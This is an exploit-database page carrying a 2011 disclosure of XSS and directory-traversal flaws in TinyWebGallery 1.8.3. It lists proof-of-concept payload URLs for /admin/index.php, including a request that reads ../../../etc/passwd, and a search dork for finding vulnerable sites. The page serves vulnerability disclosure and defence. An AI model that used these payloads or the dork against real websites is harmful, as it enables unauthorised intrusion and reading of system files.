header-logo
Suggest Exploit
vendor:
TinyWebGallery
by:
Yam Mesicka
7.5
CVSS
HIGH
Non-persistent XSS and Directory Traversal
79 (XSS) and 22 (Directory Traversal)
CWE
Product Name: TinyWebGallery
Affected Version From: 1.8.2003
Affected Version To: 1.8.2003
Patch Exists: NO
Related CWE: N/A
CPE: a:tinywebgallery:tinywebgallery:1.8.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Non-persistent XSS and Directory Traversal in TinyWebGallery 1.8.3

Non-persistent XSS and Directory Traversal vulnerability exists in TinyWebGallery 1.8.3. Non-persistent XSS can be exploited by passing malicious JavaScript code in the parameters sview, tview, dir, and item of the file /admin/index.php. Directory Traversal can be exploited by passing malicious code in the parameter item of the file /admin/index.php. A search engine dork of 'Photo Gallery powered by TinyWebGallery 1.8.3' returns about 1.46M results.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

Date: 01/02/2011 (dd/MM/yyyy)
Script: TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com

--

Vulnerability: Non-persistent XSS
Where:
~ File: /admin/index.php
~ Parameters: sview, tview, dir, item.

Examples:
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=<script>alert("xss")</script>
http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script>
http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>
...

--

Vulnerability: Directory Traversal.
Where:
~ File: /admin/index.php
~ Parameters: item

Example:
http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

--

Dork: "Photo Gallery powered by TinyWebGallery 1.8.3" (about 1.46M results)

- Yam Mesicka
- Israel
- www.Mesicka.com

Navigation

Suggest Exploit

Services By CQR